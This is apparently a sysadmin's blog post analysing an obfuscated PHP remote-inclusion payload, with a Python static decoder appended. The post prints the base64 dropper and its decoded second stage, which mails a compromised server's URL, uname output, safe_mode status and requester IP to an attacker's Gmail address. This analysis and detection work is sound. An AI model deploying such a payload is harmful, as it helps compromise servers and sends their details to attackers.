
Foreword – Note that none of our servers are vulnerable to remote inclusion attacks.

For the most part, the exploits I covered in yesterday's post are common-or-garden PHP vulnerability scans.
Some of them are more interesting, though, mostly because they are obfuscated (base64-encoded) rather than for anything else.

If I take an example from our log files:

http://www.easy-dizzy.de/joomla/administrator/includes/js/ThemeOffice/copyright.txt

That URL returns a base64-encoded string fed to eval().
It is fairly easy to see what has been returned merely by changing the eval to an echo.

<?php
//Edited slightly for width purposes
$lmge = "JGNyZWF0b3I9YmFzZTY0X2RlY29kZSgiWm5Jek0zTm9NMnhzUUdkdFlXb".
"HNMbU52YlE9PSIpOw0KKCRzYWZlX21vZGUpPygkc2FmZXo9".
"Ik9OIik6KCRzYWZlej0iT0ZGX0hFSEUiKTsNCiRiYXNlPSJodHRw".
"Oi8vIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1JFU".
"VVFU1RfVVJJJ107IA0KJG5hbWUgPSBwaHBfdW5hbWUoKTsgJGl".
"wID0gZ2V0ZW52KCJSRU1PVEVfQUREUiIpOyAkaXAyID0gZ2V0".
"aG9zdGJ5YWRkcigkX1NFUlZFUltSRU1PVEVfQUREUl0pOyAkc3V".
"iaiA9ICRfU0VSVkVSWydIVFRQX0hPU1QnXTsgDQokbXNnID0gIl".
"xuQkFTRTogJGJhc2VcbnVuYW1lIGE6ICRuYW1lXG5CeXBhc3M6".
"ICRieXBhc3NlclxuSVA6ICRpcFxuSG9zdDogJGlwMiAkcHdkcyI7D".
"QokZnJvbSA9IkZyb206ICIuJHdyaXQuIl9fXz0iLiRzYWZlei4iPHRv".
"b2xAIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uIj4iOw0KbWFpbCgg".
"JGNyZWF0b3IsICRzdWJqLCAkbXNnLCAkZnJvbSk7";

//This is what the original script does; it is commented out so nothing runs.
//eval(base64_decode($lmge));

//To stop execution and merely see the script contents, we echo it instead of eval'ing it.
echo (base64_decode($lmge));
exit;

This outputs the following (the decoded second stage, reproduced as returned):

$creator=base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ=="); 

($safe_mode)?($safez="ON"):($safez="OFF_HEHE");
$base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; 
$name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST']; 
$msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds";
$from ="From: ".$writ."___=".$safez."<tool@".$_SERVER['HTTP_HOST'].">";
mail( $creator, $subj, $msg, $from);

So in this case we can see the attacker wants the compromised server to email him its details: the URL that worked for the exploit ($base), the output of php_uname(), whether safe_mode is on, and the requesting IP and its reverse DNS.

If we look at the email account he wants the results sent to, we can see it is a Google account.

echo base64_decode("ZnIzM3NoM2xsQGdtYWlsLmNvbQ==");   //returns fr33sh3ll@gmail.com

Google has been notified about that account.
All in all, slightly more interesting than the usual!
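The echo-instead-of-eval trick above works, but it still means pasting attacker code into a PHP interpreter. As an added example (not code from the original post), here is a small static decoder that rebuilds the concatenated base64 literal, decodes it without executing any PHP, and pulls out the indicators a defender wants: nested base64 literals, email addresses and whether the second stage calls mail(). The sample payload is constructed in the same shape as the copyright.txt file above with a fake recipient address, and all names are assumptions.

```python
"""Static triage of eval(base64_decode("...")) PHP droppers (added example)."""
import base64
import re

ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*((?:"[^"]*"\s*\.?\s*)+);')
FRAG_RE = re.compile(r'"([^"]*)"')
EVAL_RE = re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*\$(\w+)\s*\)\s*\)')
B64_LITERAL_RE = re.compile(r'base64_decode\s*\(\s*"([A-Za-z0-9+/=\s]+)"\s*\)')
EMAIL_RE = re.compile(r'[\w.+-]+@[\w-]+\.[\w.-]+')


def decode_b64(blob: str) -> str:
    """Decode the way PHP's non-strict base64_decode does: drop whitespace
    (the post's blob had a stray space in it) and tolerate lost padding."""
    clean = re.sub(r"\s+", "", blob)
    clean += "=" * (-len(clean) % 4)
    return base64.b64decode(clean).decode("utf-8", "replace")


def analyse(payload: str) -> dict:
    """Return the decoded second stage plus extracted indicators."""
    # Every $var = "..." . "..." ; assignment, with its fragments joined back up.
    variables = {name: "".join(FRAG_RE.findall(expr))
                 for name, expr in ASSIGN_RE.findall(payload)}
    # Only variables actually passed to eval(base64_decode(...)) get decoded.
    stage2 = "\n".join(decode_b64(variables[v])
                       for v in EVAL_RE.findall(payload) if v in variables)
    nested = [decode_b64(b) for b in B64_LITERAL_RE.findall(stage2)]
    emails = sorted(set(EMAIL_RE.findall(stage2 + "\n" + "\n".join(nested))))
    return {"decoded": stage2, "nested_literals": nested, "emails": emails,
            "calls_mail": re.search(r"\bmail\s*\(", stage2) is not None}


# Constructed sample (assumed names, fake recipient), shaped like the post's payload.
STAGE2 = ('$creator=base64_decode("'
          + base64.b64encode(b"dropper@example.invalid").decode() + '");\r\n'
          '$msg = "uname: ".php_uname();\r\n'
          "mail($creator, $_SERVER['HTTP_HOST'], $msg);")
_b64 = base64.b64encode(STAGE2.encode()).decode()
SAMPLE_PAYLOAD = ('$lmge = "'
                  + '".\n"'.join(_b64[i:i + 40] for i in range(0, len(_b64), 40))
                  + '";\neval(base64_decode($lmge));\n')

if __name__ == "__main__":
    report = analyse(SAMPLE_PAYLOAD)
    print(report["decoded"])
    print("recipients:", report["emails"], "calls mail():", report["calls_mail"])
```

Running it against the real copyright.txt contents instead of SAMPLE_PAYLOAD gives the same decoded script shown above, without ever touching a PHP interpreter.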
